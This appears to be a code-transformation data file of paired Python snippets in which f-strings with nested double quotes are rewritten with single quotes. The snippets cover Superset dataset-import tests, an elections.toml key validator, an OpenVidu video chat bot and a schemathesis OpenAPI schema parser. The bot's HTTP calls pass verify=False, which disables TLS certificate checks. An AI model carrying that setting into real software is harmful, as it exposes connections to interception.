Dataset API: Test import dataset
"""
self.login(username="admin")
uri = "api/v1/dataset/import/"
buf = self.create_dataset_import()
form_data = {
"formData": (buf, "dataset_export.zip"),
}
rv = self.client.post(uri, data=form_data, content_type="multipart/form-data")
response = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 200
assert response == {"message": "OK"}
database = (
db.session.query(Database).filter_by(uuid=database_config["uuid"]).one()
)
assert database.database_name == "imported_database"
assert len(database.tables) == 1
dataset = database.tables[0]
assert dataset.table_name == "imported_dataset"
assert str(dataset.uuid) == dataset_config["uuid"]
dataset.owners = []
database.owners = []
db.session.delete(dataset)
db.session.delete(database)
db.session.commit()
def test_import_dataset_v0_export(self):
num_datasets = db.session.query(SqlaTable).count()
self.login(username="admin")
uri = "api/v1/dataset/import/"
buf = BytesIO()
buf.write(json.dumps(dataset_ui_export).encode())
buf.seek(0)
form_data = {
"formData": (buf, "dataset_export.zip"),
}
rv = self.client.post(uri, data=form_data, content_type="multipart/form-data")
response = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 200
assert response == {"message": "OK"}
assert db.session.query(SqlaTable).count() == num_datasets + 1
dataset = (
db.session.query(SqlaTable).filter_by(table_name="birth_names_2").one()
)
db.session.delete(dataset)
db.session.commit()
def test_import_dataset_overwrite(self):
"""
Dataset API: Test import existing dataset
"""
self.login(username="admin")
uri = "api/v1/dataset/import/"
buf = self.create_dataset_import()
form_data = {
"formData": (buf, "dataset_export.zip"),
}
rv = self.client.post(uri, data=form_data, content_type="multipart/form-data")
response = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 200
assert response == {"message": "OK"}
# import again without overwrite flag
buf = self.create_dataset_import()
form_data = {
"formData": (buf, "dataset_export.zip"),
}
rv = self.client.post(uri, data=form_data, content_type="multipart/form-data")
response = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 422
assert response == {
"errors": [
{
"message": "Error importing dataset",
"error_type": "GENERIC_COMMAND_ERROR",
"level": "warning",
"extra": {
"datasets/imported_dataset.yaml": "Dataset already exists and `overwrite=true` was not passed",
"issue_codes": [
{
"code": 1010,
"message": "Issue 1010 - Superset encountered an error while running a command.",
}
],
},
}
]
}
# import with overwrite flag
buf = self.create_dataset_import()
form_data = {
"formData": (buf, "dataset_export.zip"),
"overwrite": "true",
}
rv = self.client.post(uri, data=form_data, content_type="multipart/form-data")
response = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 200
assert response == {"message": "OK"}
# clean up
database = (
db.session.query(Database).filter_by(uuid=database_config["uuid"]).one()
)
dataset = database.tables[0]
dataset.owners = []
database.owners = []
db.session.delete(dataset)
db.session.delete(database)
db.session.commit()
def test_import_dataset_invalid(self):
"""
Dataset API: Test import invalid dataset
"""
self.login(username="admin")
uri = "api/v1/dataset/import/"
buf = BytesIO()
with ZipFile(buf, "w") as bundle:
with bundle.open("dataset_export/metadata.yaml", "w") as fp:
fp.write(yaml.safe_dump(database_metadata_config).encode())
with bundle.open(
"dataset_export/databases/imported_database.yaml", "w"
) as fp:
fp.write(yaml.safe_dump(database_config).encode())
with bundle.open(
"dataset_export/datasets/imported_dataset.yaml", "w"
) as fp:
fp.write(yaml.safe_dump(dataset_config).encode())
buf.seek(0)
form_data = {
"formData": (buf, "dataset_export.zip"),
}
rv = self.client.post(uri, data=form_data, content_type="multipart/form-data")
response = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 422
assert response == {
"errors": [
{
"message": "Error importing dataset",
"error_type": "GENERIC_COMMAND_ERROR",
"level": "warning",
"extra": {
"metadata.yaml": {"type": ["Must be equal to SqlaTable."]},
"issue_codes": [
{
"code": 1010,
"message": (
"Issue 1010 - Superset encountered "
"an error while running a command."
),
}
],
},
}
]
}
def test_import_dataset_invalid_v0_validation(self):
"""
Dataset API: Test import invalid dataset
"""
self.login(username="admin")
uri = "api/v1/dataset/import/"
buf = BytesIO()
with ZipFile(buf, "w") as bundle:
with bundle.open(
"dataset_export/databases/imported_database.yaml", "w"
) as fp:
fp.write(yaml.safe_dump(database_config).encode())
with bundle.open(
"dataset_export/datasets/imported_dataset.yaml", "w"
) as fp:
fp.write(yaml.safe_dump(dataset_config).encode())
buf.seek(0)
form_data = {
"formData": (buf, "dataset_export.zip"),
}
rv = self.client.post(uri, data=form_data, content_type="multipart/form-data")
response = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 422
assert response == {
"errors": [
{
"message": "Could not find a valid command to import file",
"error_type": "GENERIC_COMMAND_ERROR",
"level": "warning",
"extra": {
"issue_codes": [
{
"code": 1010,
"message": "Issue 1010 - Superset encountered an error while running a command.",
}
]
},
}
]
}
|
"""
Validates all keys in all elections.toml files are valid according to
the keys in election_schema, plus a few hardcoded values
It might be that the key is a new key and we've not decided to what to do
with it yet. That might be fine.
Usually its a typo though.
NOTE: This doesn't check valid hierarchy, only key names.
"""
import os
import sys
import tomlkit
from election_schema import methods, deadlines
# These keys are not specified in election_schema, but they are also valid.
all_valid_keys = [
"date",
"name",
"in_person_start",
"original_date",
"results",
"sources",
]
# Known invalid keys: These keys are not in-use yet, but we know about them
# And they're fine.
known_invalid_keys = ["mailed_out", "email_by", "fax_by"]
# We need a flat list of keys.
for method in methods:
all_valid_keys.append(method)
for deadline in deadlines:
all_valid_keys.append(deadline)
for deadline_type in deadlines[deadline]:
all_valid_keys.append(deadline_type)
# If these are found they will fail the CI. They include common typos and
# auto-complete induced mistakes.
key_denylist = [
"asbentee",
"in_person_starts",
"post_mark_by",
"receive",
"recieve_by",
"received_starts",
"register",
"source",
]
suspicious_keywords = []
denylist_errors = []
for state in sorted(os.listdir("states/")):
state_fn = os.path.join("states", state, "elections.toml")
if not os.path.exists(state_fn):
continue
with open(state_fn, "r") as f:
state_elections = dict(tomlkit.loads(f.read()))
for election in state_elections:
state_election = dict(state_elections[election])
for state_election_key in state_election:
if state_election_key in key_denylist:
denylist_errors.append(
f"ERROR: states/{state}/elections.toml - {state_election_key} is a denied key"
)
elif state_election_key not in all_valid_keys:
suspicious_keywords.append(
f"WARNING: states/{state}/elections.toml - {state_election_key} is a suspicious key"
)
if state_election_key in deadlines:
for state_election_event in state_election[state_election_key]:
if state_election_event in key_denylist:
denylist_errors.append(
f"ERROR: states/{state}/elections.toml - {state_election_event} is a denied key"
)
elif state_election_event not in all_valid_keys:
suspicious_keywords.append(
f"WARNING: states/{state}/elections.toml - {state_election_event} is a suspicious key"
)
if suspicious_keywords:
print(*suspicious_keywords, sep="\n")
print(
f"\nCompare warnings above{" and errors below" if denylist_errors else ""} to valid keys:\n{all_valid_keys}"
)
if len(known_invalid_keys) > 0:
print(f"\nAs well as known acceptable invalid keys:\n{known_invalid_keys}\n")
if denylist_errors:
print(*denylist_errors, sep="\n")
raise RuntimeError("Denied Keywords Found")
| """
Validates all keys in all elections.toml files are valid according to
the keys in election_schema, plus a few hardcoded values
It might be that the key is a new key and we've not decided to what to do
with it yet. That might be fine.
Usually its a typo though.
NOTE: This doesn't check valid hierarchy, only key names.
"""
import os
import sys
import tomlkit
from election_schema import methods, deadlines
# These keys are not specified in election_schema, but they are also valid.
all_valid_keys = [
"date",
"name",
"in_person_start",
"original_date",
"results",
"sources",
]
# Known invalid keys: These keys are not in-use yet, but we know about them
# And they're fine.
known_invalid_keys = ["mailed_out", "email_by", "fax_by"]
# We need a flat list of keys.
for method in methods:
all_valid_keys.append(method)
for deadline in deadlines:
all_valid_keys.append(deadline)
for deadline_type in deadlines[deadline]:
all_valid_keys.append(deadline_type)
# If these are found they will fail the CI. They include common typos and
# auto-complete induced mistakes.
key_denylist = [
"asbentee",
"in_person_starts",
"post_mark_by",
"receive",
"recieve_by",
"received_starts",
"register",
"source",
]
suspicious_keywords = []
denylist_errors = []
for state in sorted(os.listdir("states/")):
state_fn = os.path.join("states", state, "elections.toml")
if not os.path.exists(state_fn):
continue
with open(state_fn, "r") as f:
state_elections = dict(tomlkit.loads(f.read()))
for election in state_elections:
state_election = dict(state_elections[election])
for state_election_key in state_election:
if state_election_key in key_denylist:
denylist_errors.append(
f"ERROR: states/{state}/elections.toml - {state_election_key} is a denied key"
)
elif state_election_key not in all_valid_keys:
suspicious_keywords.append(
f"WARNING: states/{state}/elections.toml - {state_election_key} is a suspicious key"
)
if state_election_key in deadlines:
for state_election_event in state_election[state_election_key]:
if state_election_event in key_denylist:
denylist_errors.append(
f"ERROR: states/{state}/elections.toml - {state_election_event} is a denied key"
)
elif state_election_event not in all_valid_keys:
suspicious_keywords.append(
f"WARNING: states/{state}/elections.toml - {state_election_event} is a suspicious key"
)
if suspicious_keywords:
print(*suspicious_keywords, sep="\n")
print(
f"\nCompare warnings above{' and errors below' if denylist_errors else ''} to valid keys:\n{all_valid_keys}"
)
if len(known_invalid_keys) > 0:
print(f"\nAs well as known acceptable invalid keys:\n{known_invalid_keys}\n")
if denylist_errors:
print(*denylist_errors, sep="\n")
raise RuntimeError("Denied Keywords Found")
|
from socketIO_client import SocketIO, BaseNamespace
from time import sleep
import json
import requests
import base64
import sys
import os
import argparse
URI = None
TOKEN = None
TASK_ID = None
OPENVIDU_URL = None
OPENVIDU_AUTH_TOKEN = None
# Define the namespace
class ChatNamespace(BaseNamespace):
# Called when connected
def __init__(self, io, path):
super().__init__(io, path)
self.sessions = dict()
self.id = None
self.emit('ready')
@staticmethod
def create_session(session_id):
resp = requests.post(OPENVIDU_URL + '/api/sessions', verify=False,
headers={
"Authorization": OPENVIDU_AUTH_TOKEN,
"Content-Type": "application/json",
},
data=json.dumps({
"customSessionId": session_id
})
)
if resp.status_code == 409:
return session_id
elif resp.status_code == 200:
return json.loads(resp.content)['id']
def get_user_token(self, room, user_id):
if user_id == self.id:
return
session = self.sessions.get(room)
if not session:
return
resp = requests.post(OPENVIDU_URL + '/api/tokens', verify=False,
headers={
"Authorization": OPENVIDU_AUTH_TOKEN,
"Content-Type": "application/json",
},
data=json.dumps({
"session": str(session['id'])
})
)
if resp.status_code == 200:
user_token = json.loads(resp.content)['token']
session['tokens'][user_id] = user_token
return user_token
def on_joined_room(self, data):
self.id = data['user']
resp = requests.get(f"{URI}/room/{data["room"]}", headers={"Authorization": f"Token {TOKEN}"})
if resp.status_code == 200:
room = json.loads(resp.content)
for id in room['current_users'].keys():
if self.get_user_token(data['room'], int(id)):
self.send_tokens_to_client(data['room'], int(id))
def on_new_task_room(self, data):
if data['task'] == TASK_ID:
self.sessions[data["room"]] = {"id": self.create_session(data['room']), "tokens": dict()}
self.emit("join_room", {'user': self.id, 'room': data['room']})
def on_status(self, data):
if data['type'] != 'join':
return
room = data['room']
user_id = int(data['user']['id'])
self.get_user_token(room, user_id)
self.send_tokens_to_client(room, user_id)
@staticmethod
def update_client_token_response(success, data=None):
if not success:
print("Could not update client token:", data)
sys.exit(3)
print("token sent to client")
def send_tokens_to_client(self, room, user_id):
session = self.sessions.get(room)
if not session:
return
token = session['tokens'].get(user_id)
if not token:
return
sleep(1)
self.emit("set_attribute", {"attribute": "value", "value": token, "id": "openvidu-token", 'receiver_id': user_id, 'room': room}, self.update_client_token_response)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Run Video bot')
if 'TOKEN' in os.environ:
token = {'default': os.environ['TOKEN']}
else:
token = {'required': True}
if 'CHAT_HOST' in os.environ:
chat_host = {'default': os.environ['CHAT_HOST']}
else:
chat_host = {'default': 'http://localhost'}
if 'CHAT_PORT' in os.environ:
chat_port = {'default': os.environ['CHAT_PORT']}
else:
chat_port = {'default': None}
if 'VIDEO_TASK_ID' in os.environ:
task_id = {'default': os.environ['VIDEO_TASK_ID']}
else:
task_id = {'default': None}
if 'OPENVIDU_SECRET_URL' in os.environ:
openvidu_url = {'default': os.environ['OPENVIDU_SECRET_URL']}
else:
openvidu_url = {'default': 'https://localhost:4443'}
if 'OPENVIDU_SECRET_KEY' in os.environ:
openvidu_secret_key = {'default': os.environ['OPENVIDU_SECRET_KEY']}
else:
openvidu_secret_key = {'required': True}
parser.add_argument('-t', '--token',
help='token for logging in as bot (see SERVURL/token)',
**token)
parser.add_argument('-c', '--chat_host',
help='full URL (protocol, hostname; ending with /) of chat server',
**chat_host)
parser.add_argument('-p', '--chat_port',
type=int,
help='port of chat server',
**chat_port)
parser.add_argument('--task_id',
type=int,
help='Task to join',
**task_id)
parser.add_argument('--openvidu-url',
help='url for the openvidu server',
**openvidu_url)
parser.add_argument('--openvidu-secret-key',
help='Secret key for the openvidu server',
**openvidu_secret_key)
args = parser.parse_args()
TASK_ID = args.task_id
OPENVIDU_AUTH_TOKEN = 'Basic ' + base64.b64encode(bytes('OPENVIDUAPP:' + args.openvidu_secret_key, 'utf8')).decode(
'utf8')
OPENVIDU_URL = args.openvidu_url
URI = args.chat_host
if args.chat_port:
URI += f":{args.chat_port}"
sys.stdout.flush()
URI += "/api/v2"
TOKEN = args.token
# We pass token and name in request header
socketIO = SocketIO(args.chat_host, args.chat_port,
headers={'Authorization': TOKEN, 'Name': 'Video Bot'},
Namespace=ChatNamespace)
socketIO.wait()
| from socketIO_client import SocketIO, BaseNamespace
from time import sleep
import json
import requests
import base64
import sys
import os
import argparse
URI = None
TOKEN = None
TASK_ID = None
OPENVIDU_URL = None
OPENVIDU_AUTH_TOKEN = None
# Define the namespace
class ChatNamespace(BaseNamespace):
# Called when connected
def __init__(self, io, path):
super().__init__(io, path)
self.sessions = dict()
self.id = None
self.emit('ready')
@staticmethod
def create_session(session_id):
resp = requests.post(OPENVIDU_URL + '/api/sessions', verify=False,
headers={
"Authorization": OPENVIDU_AUTH_TOKEN,
"Content-Type": "application/json",
},
data=json.dumps({
"customSessionId": session_id
})
)
if resp.status_code == 409:
return session_id
elif resp.status_code == 200:
return json.loads(resp.content)['id']
def get_user_token(self, room, user_id):
if user_id == self.id:
return
session = self.sessions.get(room)
if not session:
return
resp = requests.post(OPENVIDU_URL + '/api/tokens', verify=False,
headers={
"Authorization": OPENVIDU_AUTH_TOKEN,
"Content-Type": "application/json",
},
data=json.dumps({
"session": str(session['id'])
})
)
if resp.status_code == 200:
user_token = json.loads(resp.content)['token']
session['tokens'][user_id] = user_token
return user_token
def on_joined_room(self, data):
self.id = data['user']
resp = requests.get(f"{URI}/room/{data['room']}", headers={'Authorization': f"Token {TOKEN}"})
if resp.status_code == 200:
room = json.loads(resp.content)
for id in room['current_users'].keys():
if self.get_user_token(data['room'], int(id)):
self.send_tokens_to_client(data['room'], int(id))
def on_new_task_room(self, data):
if data['task'] == TASK_ID:
self.sessions[data["room"]] = {"id": self.create_session(data['room']), "tokens": dict()}
self.emit("join_room", {'user': self.id, 'room': data['room']})
def on_status(self, data):
if data['type'] != 'join':
return
room = data['room']
user_id = int(data['user']['id'])
self.get_user_token(room, user_id)
self.send_tokens_to_client(room, user_id)
@staticmethod
def update_client_token_response(success, data=None):
if not success:
print("Could not update client token:", data)
sys.exit(3)
print("token sent to client")
def send_tokens_to_client(self, room, user_id):
session = self.sessions.get(room)
if not session:
return
token = session['tokens'].get(user_id)
if not token:
return
sleep(1)
self.emit("set_attribute", {"attribute": "value", "value": token, "id": "openvidu-token", 'receiver_id': user_id, 'room': room}, self.update_client_token_response)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Run Video bot')
if 'TOKEN' in os.environ:
token = {'default': os.environ['TOKEN']}
else:
token = {'required': True}
if 'CHAT_HOST' in os.environ:
chat_host = {'default': os.environ['CHAT_HOST']}
else:
chat_host = {'default': 'http://localhost'}
if 'CHAT_PORT' in os.environ:
chat_port = {'default': os.environ['CHAT_PORT']}
else:
chat_port = {'default': None}
if 'VIDEO_TASK_ID' in os.environ:
task_id = {'default': os.environ['VIDEO_TASK_ID']}
else:
task_id = {'default': None}
if 'OPENVIDU_SECRET_URL' in os.environ:
openvidu_url = {'default': os.environ['OPENVIDU_SECRET_URL']}
else:
openvidu_url = {'default': 'https://localhost:4443'}
if 'OPENVIDU_SECRET_KEY' in os.environ:
openvidu_secret_key = {'default': os.environ['OPENVIDU_SECRET_KEY']}
else:
openvidu_secret_key = {'required': True}
parser.add_argument('-t', '--token',
help='token for logging in as bot (see SERVURL/token)',
**token)
parser.add_argument('-c', '--chat_host',
help='full URL (protocol, hostname; ending with /) of chat server',
**chat_host)
parser.add_argument('-p', '--chat_port',
type=int,
help='port of chat server',
**chat_port)
parser.add_argument('--task_id',
type=int,
help='Task to join',
**task_id)
parser.add_argument('--openvidu-url',
help='url for the openvidu server',
**openvidu_url)
parser.add_argument('--openvidu-secret-key',
help='Secret key for the openvidu server',
**openvidu_secret_key)
args = parser.parse_args()
TASK_ID = args.task_id
OPENVIDU_AUTH_TOKEN = 'Basic ' + base64.b64encode(bytes('OPENVIDUAPP:' + args.openvidu_secret_key, 'utf8')).decode(
'utf8')
OPENVIDU_URL = args.openvidu_url
URI = args.chat_host
if args.chat_port:
URI += f":{args.chat_port}"
sys.stdout.flush()
URI += "/api/v2"
TOKEN = args.token
# We pass token and name in request header
socketIO = SocketIO(args.chat_host, args.chat_port,
headers={'Authorization': TOKEN, 'Name': 'Video Bot'},
Namespace=ChatNamespace)
socketIO.wait()
|
# pylint: disable=too-many-ancestors
import itertools
from copy import deepcopy
from typing import Any, Callable, Dict, Generator, Iterator, List, Optional, Sequence, Tuple
from urllib.parse import urljoin, urlsplit
import jsonschema
from hypothesis.strategies import SearchStrategy
from requests.structures import CaseInsensitiveDict
from ...exceptions import InvalidSchema
from ...hooks import HookContext
from ...models import Case, Endpoint, EndpointDefinition, empty_object
from ...schemas import BaseSchema
from ...stateful import StatefulTest
from ...utils import GenericResponse
from . import links, serialization
from .converter import to_json_schema_recursive
from .examples import get_strategies_from_examples
from .filters import should_skip_by_operation_id, should_skip_by_tag, should_skip_endpoint, should_skip_method
from .references import ConvertingResolver
from .security import BaseSecurityProcessor, OpenAPISecurityProcessor, SwaggerSecurityProcessor
class BaseOpenAPISchema(BaseSchema):
nullable_name: str
links_field: str
operations: Tuple[str, ...]
security: BaseSecurityProcessor
_endpoints_by_operation_id: Dict[str, Endpoint]
@property # pragma: no mutate
def spec_version(self) -> str:
raise NotImplementedError
def get_stateful_tests(
self, response: GenericResponse, endpoint: Endpoint, stateful: Optional[str]
) -> Sequence[StatefulTest]:
if stateful == "links":
return links.get_links(response, endpoint, field=self.links_field)
return []
@property
def base_path(self) -> str:
raise NotImplementedError
def get_full_path(self, path: str) -> str:
"""Compute full path for the given path."""
return urljoin(self.base_path, path.lstrip("/")) # pragma: no mutate
def __repr__(self) -> str:
info = self.raw_schema["info"]
return f"{self.__class__.__name__} for {info["title"]} ({info["version"]})"
@property
def endpoints(self) -> Dict[str, CaseInsensitiveDict]:
if not hasattr(self, "_endpoints"):
# pylint: disable=attribute-defined-outside-init
endpoints = self.get_all_endpoints()
self._endpoints = endpoints_to_dict(endpoints)
return self._endpoints
def get_all_endpoints(self) -> Generator[Endpoint, None, None]:
try:
paths = self.raw_schema["paths"] # pylint: disable=unsubscriptable-object
context = HookContext()
for path, methods in paths.items():
full_path = self.get_full_path(path)
if should_skip_endpoint(full_path, self.endpoint):
continue
self.dispatch_hook("before_process_path", context, path, methods)
scope, raw_methods = self._resolve_methods(methods)
methods = self.resolver.resolve_all(methods)
common_parameters = get_common_parameters(methods)
for method, resolved_definition in methods.items():
# Only method definitions are parsed
if (
method not in self.operations
or should_skip_method(method, self.method)
or should_skip_by_tag(resolved_definition.get("tags"), self.tag)
or should_skip_by_operation_id(resolved_definition.get("operationId"), self.operation_id)
):
continue
parameters = itertools.chain(resolved_definition.get("parameters", ()), common_parameters)
# To prevent recursion errors we need to pass not resolved schema as well
# It could be used for response validation
raw_definition = EndpointDefinition(raw_methods[method], resolved_definition, scope)
yield self.make_endpoint(full_path, method, parameters, resolved_definition, raw_definition)
except (KeyError, AttributeError, jsonschema.exceptions.RefResolutionError):
raise InvalidSchema("Schema parsing failed. Please check your schema.")
def _resolve_methods(self, methods: Dict[str, Any]) -> Tuple[str, Dict[str, Any]]:
# We need to know a proper scope in what methods are.
# It will allow us to provide a proper reference resolving in `response_schema_conformance` and avoid
# recursion errors
if "$ref" in methods:
return deepcopy(self.resolver.resolve(methods["$ref"]))
return self.resolver.resolution_scope, deepcopy(methods)
def make_endpoint( # pylint: disable=too-many-arguments
self,
full_path: str,
method: str,
parameters: Iterator[Dict[str, Any]],
resolved_definition: Dict[str, Any],
raw_definition: EndpointDefinition,
) -> Endpoint:
"""Create JSON schemas for query, body, etc from Swagger parameters definitions."""
base_url = self.base_url
if base_url is not None:
base_url = base_url.rstrip("/") # pragma: no mutate
endpoint = Endpoint(
path=full_path,
method=method.upper(),
definition=raw_definition,
base_url=base_url,
app=self.app,
schema=self,
)
for parameter in parameters:
self.process_parameter(endpoint, parameter)
self.security.process_definitions(self.raw_schema, endpoint, self.resolver)
return endpoint
def process_parameter(self, endpoint: Endpoint, parameter: Dict[str, Any]) -> None:
"""Convert each Parameter object to a JSON schema."""
parameter = deepcopy(parameter)
parameter = self.resolver.resolve_all(parameter)
self.process_by_type(endpoint, parameter)
def process_by_type(self, endpoint: Endpoint, parameter: Dict[str, Any]) -> None:
raise NotImplementedError
@property
def resolver(self) -> ConvertingResolver:
if not hasattr(self, "_resolver"):
# pylint: disable=attribute-defined-outside-init
self._resolver = ConvertingResolver(self.location or "", self.raw_schema, nullable_name=self.nullable_name)
return self._resolver
def get_content_types(self, endpoint: Endpoint, response: GenericResponse) -> List[str]:
"""Content types available for this endpoint."""
raise NotImplementedError
def get_strategies_from_examples(self, endpoint: Endpoint) -> List[SearchStrategy[Case]]:
"""Get examples from endpoint."""
raise NotImplementedError
def get_response_schema(self, definition: Dict[str, Any], scope: str) -> Tuple[List[str], Optional[Dict[str, Any]]]:
"""Extract response schema from `responses`."""
raise NotImplementedError
def get_endpoint_by_operation_id(self, operation_id: str) -> Endpoint:
"""Get an `Endpoint` instance by its `operationId`."""
if not hasattr(self, "_endpoints_by_operation_id"):
self._endpoints_by_operation_id = dict(self._group_endpoints_by_operation_id())
return self._endpoints_by_operation_id[operation_id]
def _group_endpoints_by_operation_id(self) -> Generator[Tuple[str, Endpoint], None, None]:
for path, methods in self.raw_schema["paths"].items():
full_path = self.get_full_path(path)
scope, raw_methods = self._resolve_methods(methods)
methods = self.resolver.resolve_all(methods)
common_parameters = get_common_parameters(methods)
for method, resolved_definition in methods.items():
if method not in self.operations or "operationId" not in resolved_definition:
continue
parameters = itertools.chain(resolved_definition.get("parameters", ()), common_parameters)
raw_definition = EndpointDefinition(raw_methods[method], resolved_definition, scope)
yield resolved_definition["operationId"], self.make_endpoint(
full_path, method, parameters, resolved_definition, raw_definition
)
def get_endpoint_by_reference(self, reference: str) -> Endpoint:
"""Get local or external `Endpoint` instance by reference.
Reference example: #/paths/~1users~1{user_id}/patch
"""
scope, data = self.resolver.resolve(reference)
path, method = scope.rsplit("/", maxsplit=2)[-2:]
path = path.replace("~1", "/").replace("~0", "~")
full_path = self.get_full_path(path)
resolved_definition = self.resolver.resolve_all(data)
parent_ref, _ = reference.rsplit("/", maxsplit=1)
_, methods = self.resolver.resolve(parent_ref)
common_parameters = get_common_parameters(methods)
parameters = itertools.chain(resolved_definition.get("parameters", ()), common_parameters)
raw_definition = EndpointDefinition(data, resolved_definition, scope)
return self.make_endpoint(full_path, method, parameters, resolved_definition, raw_definition)
class SwaggerV20(BaseOpenAPISchema):
nullable_name = "x-nullable"
example_field = "x-example"
examples_field = "x-examples"
operations: Tuple[str, ...] = ("get", "put", "post", "delete", "options", "head", "patch")
security = SwaggerSecurityProcessor()
links_field = "x-links"
@property
def spec_version(self) -> str:
return self.raw_schema["swagger"]
@property
def verbose_name(self) -> str:
return f"Swagger {self.spec_version}"
@property
def base_path(self) -> str:
"""Base path for the schema."""
path: str = self.raw_schema.get("basePath", "/") # pragma: no mutate
if not path.endswith("/"):
path += "/"
return path
def get_strategies_from_examples(self, endpoint: Endpoint) -> List[SearchStrategy[Case]]:
"""Get examples from endpoint."""
return get_strategies_from_examples(endpoint, self.examples_field)
def process_by_type(self, endpoint: Endpoint, parameter: Dict[str, Any]) -> None:
if parameter["in"] == "path":
self.process_path(endpoint, parameter)
elif parameter["in"] == "query":
self.process_query(endpoint, parameter)
elif parameter["in"] == "header":
self.process_header(endpoint, parameter)
elif parameter["in"] == "body":
# Could be only one parameter with "in=body"
self.process_body(endpoint, parameter)
elif parameter["in"] == "formData":
self.process_form_data(endpoint, parameter)
def process_path(self, endpoint: Endpoint, parameter: Dict[str, Any]) -> None:
endpoint.path_parameters = self.add_parameter(endpoint.path_parameters, parameter)
def process_header(self, endpoint: Endpoint, parameter: Dict[str, Any]) -> None:
endpoint.headers = self.add_parameter(endpoint.headers, parameter)
def process_query(self, endpoint: Endpoint, parameter: Dict[str, Any]) -> None:
endpoint.query = self.add_parameter(endpoint.query, parameter)
def process_body(self, endpoint: Endpoint, parameter: Dict[str, Any]) -> None:
# "schema" is a required field
endpoint.body = parameter["schema"]
def process_form_data(self, endpoint: Endpoint, parameter: Dict[str, Any]) -> None:
endpoint.form_data = self.add_parameter(endpoint.form_data, parameter)
def add_parameter(self, container: Optional[Dict[str, Any]], parameter: Dict[str, Any]) -> Dict[str, Any]:
"""Add parameter object to the container."""
name = parameter["name"]
container = container or empty_object()
container["properties"][name] = self.parameter_to_json_schema(parameter)
if parameter.get("required", False):
container["required"].append(name)
return self.add_examples(container, parameter)
def add_examples(self, container: Dict[str, Any], parameter: Dict[str, Any]) -> Dict[str, Any]:
if self.example_field in parameter:
examples = container.setdefault("example", {}) # examples should be merged together
examples[parameter["name"]] = parameter[self.example_field]
return container
def parameter_to_json_schema(self, data: Dict[str, Any]) -> Dict[str, Any]:
"""Convert Parameter object to a JSON schema."""
return {
key: value
for key, value in data.items()
# Do not include keys not supported by JSON schema
if not (key == "required" and not isinstance(value, list))
}
def get_response_schema(self, definition: Dict[str, Any], scope: str) -> Tuple[List[str], Optional[Dict[str, Any]]]:
scopes, definition = self.resolver.resolve_in_scope(deepcopy(definition), scope)
schema = definition.get("schema")
if not schema:
return scopes, None
# Extra conversion to JSON Schema is needed here if there was one $ref in the input
# because it is not converted
return scopes, to_json_schema_recursive(schema, self.nullable_name)
def get_content_types(self, endpoint: Endpoint, response: GenericResponse) -> List[str]:
produces = endpoint.definition.raw.get("produces", None)
if produces:
return produces
return self.raw_schema.get("produces", [])
def get_hypothesis_conversion(self, definitions: List[Dict[str, Any]]) -> Optional[Callable]:
return serialization.serialize_swagger2_parameters(definitions)
class OpenApi30(SwaggerV20): # pylint: disable=too-many-ancestors
nullable_name = "nullable"
example_field = "example"
examples_field = "examples"
operations = SwaggerV20.operations + ("trace",)
security = OpenAPISecurityProcessor()
links_field = "links"
@property
def spec_version(self) -> str:
return self.raw_schema["openapi"]
@property
def verbose_name(self) -> str:
return f"Open API {self.spec_version}"
@property
def base_path(self) -> str:
"""Base path for the schema."""
servers = self.raw_schema.get("servers", [])
if servers:
# assume we're the first server in list
server = servers[0]
url = server["url"].format(**{k: v["default"] for k, v in server.get("variables", {}).items()})
path = urlsplit(url).path
else:
path = "/"
if not path.endswith("/"):
path += "/"
return path
def make_endpoint( # pylint: disable=too-many-arguments
self,
full_path: str,
method: str,
parameters: Iterator[Dict[str, Any]],
resolved_definition: Dict[str, Any],
raw_definition: EndpointDefinition,
) -> Endpoint:
"""Create JSON schemas for query, body, etc from Swagger parameters definitions."""
endpoint = super().make_endpoint(full_path, method, parameters, resolved_definition, raw_definition)
if "requestBody" in resolved_definition:
self.process_body(endpoint, resolved_definition["requestBody"])
return endpoint
def process_by_type(self, endpoint: Endpoint, parameter: Dict[str, Any]) -> None:
if parameter["in"] == "cookie":
self.process_cookie(endpoint, parameter)
else:
super().process_by_type(endpoint, parameter)
def add_examples(self, container: Dict[str, Any], parameter: Dict[str, Any]) -> Dict[str, Any]:
schema = get_schema_from_parameter(parameter)
if self.example_field in schema:
examples = container.setdefault("example", {}) # examples should be merged together
examples[parameter["name"]] = schema[self.example_field]
# https://github.com/OAI/OpenAPI-Specification/blob/master/versions/3.0.2.md#parameter-object
# > Furthermore, if referencing a schema which contains an example,
# > the example value SHALL override the example provided by the schema
return super().add_examples(container, parameter)
def process_cookie(self, endpoint: Endpoint, parameter: Dict[str, Any]) -> None:
endpoint.cookies = self.add_parameter(endpoint.cookies, parameter)
def process_body(self, endpoint: Endpoint, parameter: Dict[str, Any]) -> None:
# Take the first media type object
options = iter(parameter["content"].values())
parameter = next(options)
# https://github.com/OAI/OpenAPI-Specification/blob/master/versions/3.0.2.md#media-type-object
# > Furthermore, if referencing a schema which contains an example,
# > the example value SHALL override the example provided by the schema
if "example" in parameter:
schema = get_schema_from_parameter(parameter)
schema["example"] = parameter["example"]
super().process_body(endpoint, parameter)
def parameter_to_json_schema(self, data: Dict[str, Any]) -> Dict[str, Any]:
schema = get_schema_from_parameter(data)
return super().parameter_to_json_schema(schema)
def get_response_schema(self, definition: Dict[str, Any], scope: str) -> Tuple[List[str], Optional[Dict[str, Any]]]:
scopes, definition = self.resolver.resolve_in_scope(deepcopy(definition), scope)
options = iter(definition.get("content", {}).values())
option = next(options, None)
if option:
# Extra conversion to JSON Schema is needed here if there was one $ref in the input
# because it is not converted
return scopes, to_json_schema_recursive(option["schema"], self.nullable_name)
return scopes, None
def get_strategies_from_examples(self, endpoint: Endpoint) -> List[SearchStrategy[Case]]:
"""Get examples from endpoint."""
return get_strategies_from_examples(endpoint, self.examples_field)
def get_content_types(self, endpoint: Endpoint, response: GenericResponse) -> List[str]:
try:
responses = endpoint.definition.raw["responses"]
except KeyError:
# Possible to get if `validate_schema=False` is passed during schema creation
raise InvalidSchema("Schema parsing failed. Please check your schema.")
definitions = responses.get(str(response.status_code), {}).get("content", {})
return list(definitions.keys())
